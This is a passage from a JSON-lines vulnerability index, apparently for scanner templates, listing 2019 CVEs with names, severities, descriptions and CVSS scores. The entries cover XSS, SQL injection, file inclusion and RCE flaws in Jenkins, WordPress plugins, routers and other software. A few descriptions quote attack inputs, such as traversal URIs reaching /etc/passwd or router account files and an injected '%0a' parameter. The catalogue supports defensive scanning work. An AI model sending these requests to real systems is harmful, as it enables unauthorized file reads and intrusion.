URL","Classification":{"CVSSScore":"4.3"}},"file_path":"cves/2019/CVE-2019-10405.yaml"} +{"ID":"CVE-2019-10475","Info":{"Name":"Jenkins build-metrics 1.3 - Cross-Site Scripting","Severity":"medium","Description":"Jenkins build-metrics 1.3 is vulnerable to a reflected cross-site scripting vulnerability that allows attackers to inject arbitrary HTML and JavaScript into the web pages the plugin provides.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-10475.yaml"} +{"ID":"CVE-2019-10692","Info":{"Name":"WordPress Google Maps \u003c7.11.18 - SQL Injection","Severity":"critical","Description":"WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-10692.yaml"} +{"ID":"CVE-2019-10717","Info":{"Name":"BlogEngine.NET 3.3.7.0 - Local File Inclusion","Severity":"high","Description":"BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter\n","Classification":{"CVSSScore":"7.1"}},"file_path":"cves/2019/CVE-2019-10717.yaml"} +{"ID":"CVE-2019-10758","Info":{"Name":"mongo-express Remote Code Execution","Severity":"critical","Description":"mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment.","Classification":{"CVSSScore":"9.9"}},"file_path":"cves/2019/CVE-2019-10758.yaml"} +{"ID":"CVE-2019-11013","Info":{"Name":"Nimble Streamer \u003c=3.5.4-9 - Local File Inclusion","Severity":"medium","Description":"Nimble Streamer 3.0.2-2 through 3.5.4-9 is vulnerable to local file inclusion. An attacker can traverse the file system to access files or directories that are outside of the restricted directory on the remote server.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2019/CVE-2019-11013.yaml"} +{"ID":"CVE-2019-11248","Info":{"Name":"Debug Endpoint pprof - Exposure Detection","Severity":"high","Description":"The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"cves/2019/CVE-2019-11248.yaml"} +{"ID":"CVE-2019-11370","Info":{"Name":"Carel pCOWeb \u003cB1.2.4 - Cross-Site Scripting","Severity":"medium","Description":"Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html \"System contact\" field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2019/CVE-2019-11370.yaml"} +{"ID":"CVE-2019-11510","Info":{"Name":"Pulse Connect Secure SSL VPN Arbitrary File Read","Severity":"critical","Description":"Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2019/CVE-2019-11510.yaml"} +{"ID":"CVE-2019-11580","Info":{"Name":"Atlassian Crowd and Crowd Data Center Unauthenticated Remote Code Execution","Severity":"critical","Description":"Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-11580.yaml"} +{"ID":"CVE-2019-11581","Info":{"Name":"Atlassian Jira Server-Side Template Injection","Severity":"critical","Description":"Jira Server and Data Center is susceptible to a server-side template injection vulnerability via the ContactAdministrators and SendBulkMail actions. An attacker is able to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-11581.yaml"} +{"ID":"CVE-2019-11869","Info":{"Name":"WordPress Yuzo \u003c5.12.94 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting\nbecause it mistakenly expects that is_admin() verifies that the\nrequest comes from an admin user (it actually only verifies that the\nrequest is for an admin page). An unauthenticated attacker can consequently inject\na payload into the plugin settings, such as the\nyuzo_related_post_css_and_style setting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-11869.yaml"} +{"ID":"CVE-2019-12276","Info":{"Name":"GrandNode 4.40 - Local File Inclusion","Severity":"high","Description":"GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-12276.yaml"} +{"ID":"CVE-2019-12314","Info":{"Name":"Deltek Maconomy 2.2.5 - Local File Inclusion","Severity":"critical","Description":"Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-12314.yaml"} +{"ID":"CVE-2019-12461","Info":{"Name":"WebPort 1.19.1 - Cross-Site Scripting","Severity":"medium","Description":"Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-12461.yaml"} +{"ID":"CVE-2019-12581","Info":{"Name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","Severity":"medium","Description":"Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-12581.yaml"} +{"ID":"CVE-2019-12583","Info":{"Name":"Zyxel ZyWall UAG/USG - Account Creation Access","Severity":"critical","Description":"Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the \"Free Time\" component. This can lead to unauthorized network access or DoS attacks.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2019/CVE-2019-12583.yaml"} +{"ID":"CVE-2019-12593","Info":{"Name":"IceWarp Mail Server \u003c=10.4.4 - Local File Inclusion","Severity":"high","Description":"IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-12593.yaml"} +{"ID":"CVE-2019-12616","Info":{"Name":"phpMyAdmin \u003c 4.9.0 - CSRF","Severity":"medium","Description":"A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken \u003cimg\u003e tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2019/CVE-2019-12616.yaml"} +{"ID":"CVE-2019-12725","Info":{"Name":"Zeroshell 3.9.0 - Remote Command Execution","Severity":"critical","Description":"Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-12725.yaml"} +{"ID":"CVE-2019-12962","Info":{"Name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","Severity":"medium","Description":"LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-12962.yaml"} +{"ID":"CVE-2019-13101","Info":{"Name":"D-Link DIR-600M - Authentication Bypass","Severity":"critical","Description":"D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-13101.yaml"} +{"ID":"CVE-2019-13392","Info":{"Name":"MindPalette NateMail 3.0.15 - Cross-Site Scripting","Severity":"medium","Description":"MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-13392.yaml"} +{"ID":"CVE-2019-13396","Info":{"Name":"FlightPath - Local File Inclusion","Severity":"medium","Description":"FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2019/CVE-2019-13396.yaml"} +{"ID":"CVE-2019-13462","Info":{"Name":"Lansweeper Unauthenticated SQL Injection","Severity":"critical","Description":"Lansweeper before 7.1.117.4 allows unauthenticated SQL injection.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2019/CVE-2019-13462.yaml"} +{"ID":"CVE-2019-14205","Info":{"Name":"WordPress Nevma Adaptive Images \u003c0.6.67 - Local File Inclusion","Severity":"high","Description":"WordPress Nevma Adaptive Images plugin before 0.6.67 allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-14205.yaml"} +{"ID":"CVE-2019-14223","Info":{"Name":"Alfresco Share - Open Redirect","Severity":"medium","Description":"Alfresco Share before 5.2.6, 6.0.N and 6.1.N contains an open redirect vulnerability via a crafted POST request. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-14223.yaml"} +{"ID":"CVE-2019-14251","Info":{"Name":"T24 Web Server - Local File Inclusion","Severity":"high","Description":"T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-14251.yaml"} +{"ID":"CVE-2019-14312","Info":{"Name":"Aptana Jaxer 1.0.3.4547 - Local File inclusion","Severity":"medium","Description":"Aptana Jaxer 1.0.3.4547 is vulnerable to local file inclusion in the wikilite source code viewer. An attacker can read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2019/CVE-2019-14312.yaml"} +{"ID":"CVE-2019-14322","Info":{"Name":"Pallets Werkzeug \u003c0.15.5 - Local File Inclusion","Severity":"high","Description":"Pallets Werkzeug before 0.15.5 is susceptible to local file inclusion because SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-14322.yaml"} +{"ID":"CVE-2019-14470","Info":{"Name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","Severity":"medium","Description":"WordPress UserPro 4.9.32 is vulnerable to reflected cross-site scripting because the Instagram PHP API (v2) it relies on allows it via the example/success.php error_description parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-14470.yaml"} +{"ID":"CVE-2019-14530","Info":{"Name":"OpenEMR \u003c 5.0.2 - Path Traversal","Severity":"high","Description":"An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2019/CVE-2019-14530.yaml"} +{"ID":"CVE-2019-14696","Info":{"Name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","Severity":"medium","Description":"Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-14696.yaml"} +{"ID":"CVE-2019-14974","Info":{"Name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","Severity":"medium","Description":"SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-14974.yaml"} +{"ID":"CVE-2019-15107","Info":{"Name":"Webmin \u003c= 1.920 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Webmin \u003c=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-15107.yaml"} +{"ID":"CVE-2019-15501","Info":{"Name":"L-Soft LISTSERV \u003c16.5-2018a - Cross-Site Scripting","Severity":"medium","Description":"L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-15501.yaml"} +{"ID":"CVE-2019-15713","Info":{"Name":"WordPress My Calendar \u003c= 3.1.9 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin My Calendar \u003c= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-15713.yaml"} +{"ID":"CVE-2019-15811","Info":{"Name":"DomainMOD \u003c=4.13.0 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-15811.yaml"} +{"ID":"CVE-2019-15858","Info":{"Name":"WordPress Woody Ad Snippets \u003c2.2.5 - Cross-Site Scripting/Remote Code Execution","Severity":"high","Description":"WordPress Woody Ad Snippets prior to 2.2.5 is susceptible to cross-site scripting and remote code execution via admin/includes/class.import.snippet.php, which allows unauthenticated options import as demonstrated by storing a cross-site scripting payload for remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2019/CVE-2019-15858.yaml"} +{"ID":"CVE-2019-15859","Info":{"Name":"Socomec DIRIS A-40 Devices Password Disclosure","Severity":"critical","Description":"Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-15859.yaml"} +{"ID":"CVE-2019-15889","Info":{"Name":"WordPress Download Manager \u003c2.9.94 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-15889.yaml"} +{"ID":"CVE-2019-16097","Info":{"Name":"Harbor \u003c=1.82.0 - Privilege Escalation","Severity":"medium","Description":"Harbor 1.7.0 through 1.8.2 is susceptible to privilege escalation via core/api/user.go, which allows allows non-admin users to create admin accounts via the POST /api/users API when Harbor is setup with DB as an authentication backend and allows user to do self-registration.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2019/CVE-2019-16097.yaml"} +{"ID":"CVE-2019-16123","Info":{"Name":"PilusCart \u003c=1.4.1 - Local File Inclusion","Severity":"high","Description":"PilusCart versions 1.4.1 and prior suffer from a file disclosure vulnerability via local file inclusion.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-16123.yaml"} +{"ID":"CVE-2019-16278","Info":{"Name":"nostromo 1.9.6 - Remote Code Execution","Severity":"critical","Description":"nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-16278.yaml"} +{"ID":"CVE-2019-16313","Info":{"Name":"ifw8 Router ROM v4.31 - Credential Discovery","Severity":"high","Description":"ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-16313.yaml"} +{"ID":"CVE-2019-16332","Info":{"Name":"WordPress API Bearer Auth \u003c20190907 - Cross-Site Scripting","Severity":"medium","Description":"WordPress API Bearer Auth plugin before 20190907 contains a cross-site scripting vulnerability. The server parameter is not correctly filtered in swagger-config.yaml.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-16332.yaml"} +{"ID":"CVE-2019-16525","Info":{"Name":"WordPress Checklist \u003c1.1.9 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-16525.yaml"} +{"ID":"CVE-2019-1653","Info":{"Name":"Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure","Severity":"high","Description":"Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated remote attacker to retrieve sensitive information due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-1653.yaml"} +{"ID":"CVE-2019-16662","Info":{"Name":"rConfig 3.9.2 - Remote Code Execution","Severity":"critical","Description":"rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-16662.yaml"} +{"ID":"CVE-2019-16759","Info":{"Name":"vBulletin v5.0.0-v5.5.4 - Remote Command Execution","Severity":"critical","Description":"vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-16759.yaml"} +{"ID":"CVE-2019-16920","Info":{"Name":"D-Link Routers - Remote Code Execution","Severity":"critical","Description":"D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565 contain an unauthenticated remote code execution vulnerability. The issue occurs when the attacker sends an arbitrary input to a \"PingTest\" device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these issues also affected; DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-16920.yaml"} +{"ID":"CVE-2019-16931","Info":{"Name":"WordPress Visualizer \u003c3.3.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-16931.yaml"} +{"ID":"CVE-2019-16932","Info":{"Name":"Visualizer \u003c3.3.1 - Blind Server-Side Request Forgery","Severity":"critical","Description":"Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint.\n","Classification":{"CVSSScore":"10"}},"file_path":"cves/2019/CVE-2019-16932.yaml"} +{"ID":"CVE-2019-16996","Info":{"Name":"Metinfo 7.0.0 beta - SQL Injection","Severity":"high","Description":"Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/product/admin/product_admin.class.php via the admin/?n=product\u0026c=product_admin\u0026a=dopara\u0026app_type=shop id parameter.","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2019/CVE-2019-16996.yaml"} +{"ID":"CVE-2019-16997","Info":{"Name":"Metinfo 7.0.0 beta - SQL Injection","Severity":"high","Description":"Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/language/admin/language_general.class.php via the admin/?n=language\u0026c=language_general\u0026a=doExportPack appno parameter.","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2019/CVE-2019-16997.yaml"} +{"ID":"CVE-2019-17270","Info":{"Name":"Yachtcontrol Webapplication 1.0 - Remote Command Injection","Severity":"critical","Description":"Yachtcontrol Webapplication 1.0 makes it possible to perform direct operating system commands as an unauthenticated user via the \"/pages/systemcall.php?command={COMMAND}\" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-17270.yaml"} +{"ID":"CVE-2019-17382","Info":{"Name":"Zabbix \u003c=4.4 - Authentication Bypass","Severity":"critical","Description":"Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view\u0026dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.","Classification":{"CVSSScore":"9.1"}},"file_path":"cves/2019/CVE-2019-17382.yaml"} +{"ID":"CVE-2019-17418","Info":{"Name":"MetInfo 7.0.0 beta - SQL Injection","Severity":"high","Description":"MetInfo 7.0.0 beta is susceptible to SQL injection via the admin/?n=language\u0026c=language_general\u0026a=doSearchParameter appno parameter (a different issue than CVE-2019-16997).\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2019/CVE-2019-17418.yaml"} +{"ID":"CVE-2019-17444","Info":{"Name":"Jfrog Artifactory \u003c6.17.0 - Default Admin Password","Severity":"critical","Description":"Jfrog Artifactory prior to 6.17.0 uses default passwords (such as \"password\") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-17444.yaml"} +{"ID":"CVE-2019-17503","Info":{"Name":"Kirona Dynamic Resource Scheduling - information disclosure","Severity":"medium","Description":"An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly _ it contains sensitive information about the database through the SQL queries within this batch file","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2019/CVE-2019-17503.yaml"} +{"ID":"CVE-2019-17506","Info":{"Name":"D-Link DIR-868L/817LW - Information Disclosure","Severity":"critical","Description":"D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers are vulnerable to information disclosure vulnerabilities because certain web interfaces do not require authentication. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-17506.yaml"} +{"ID":"CVE-2019-17538","Info":{"Name":"Jiangnan Online Judge 0.8.0 - Local File Inclusion","Severity":"high","Description":"Jiangnan Online Judge (aka jnoj) 0.8.0 is susceptible to local file inclusion via web/polygon/problem/viewfile?id=1\u0026name=../.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-17538.yaml"} +{"ID":"CVE-2019-17558","Info":{"Name":"Apache Solr \u003c=8.3.1 - Remote Code Execution","Severity":"high","Description":"Apache Solr versions 5.0.0 to 8.3.1 are vulnerable to remote code execution vulnerabilities through the VelocityResponseWriter. A Velocity template can be provided through Velocity templates in a configset `velocity/ directory or as a parameter. A user defined configset could contain renderable, potentially malicious, templates. Parameter provided templates are disabled by default, but can be enabled by setting `params.resource.loader.enabled by defining a response writer with that setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables the configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user).","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-17558.yaml"} +{"ID":"CVE-2019-1821","Info":{"Name":"Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution","Severity":"critical","Description":"Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-1821.yaml"} +{"ID":"CVE-2019-18371","Info":{"Name":"Xiaomi Mi WiFi R3G Routers - Local file Inclusion","Severity":"high","Description":"Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-18371.yaml"} +{"ID":"CVE-2019-18393","Info":{"Name":"Ignite Realtime Openfire \u003c4.42 - Local File Inclusion","Severity":"medium","Description":"Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2019/CVE-2019-18393.yaml"} +{"ID":"CVE-2019-18394","Info":{"Name":"Ignite Realtime Openfire \u003c=4.4.2 - Server-Side Request Forgery","Severity":"critical","Description":"Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-18394.yaml"} +{"ID":"CVE-2019-18665","Info":{"Name":"DOMOS 5.5 - Local File Inclusion","Severity":"high","Description":"SECUDOS DOMOS before 5.6 allows local file inclusion via the log module.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-18665.yaml"} +{"ID":"CVE-2019-18818","Info":{"Name":"strapi CMS \u003c3.0.0-beta.17.5 - Admin Password Reset","Severity":"critical","Description":"strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-18818.yaml"} +{"ID":"CVE-2019-18922","Info":{"Name":"Allied Telesis AT-GS950/8 - Local File Inclusion","Severity":"high","Description":"Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 is susceptible to local file inclusion via its web interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2019/CVE-2019-18922.yaml"} +{"ID":"CVE-2019-18957","Info":{"Name":"MicroStrategy Library \u003c11.1.3 - Cross-Site Scripting","Severity":"medium","Description":"MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-18957.yaml"} +{"ID":"CVE-2019-19134","Info":{"Name":"WordPress Hero Maps Premium \u003c=2.2.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-19134.yaml"} +{"ID":"CVE-2019-19368","Info":{"Name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","Severity":"medium","Description":"Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2019/CVE-2019-19368.yaml"} +{"ID":"CVE-2019-19781","Info":{"Name":"Citrix ADC and Gateway - Directory Traversal","Severity":"critical","Description":"Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2019/CVE-2019-19781.yaml"} +{"ID":"CVE-2019-19824","Info":{"Name":"TOTOLINK Realtek SD Routers - Remote Command Injection","Severity":"high","Description":"TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. 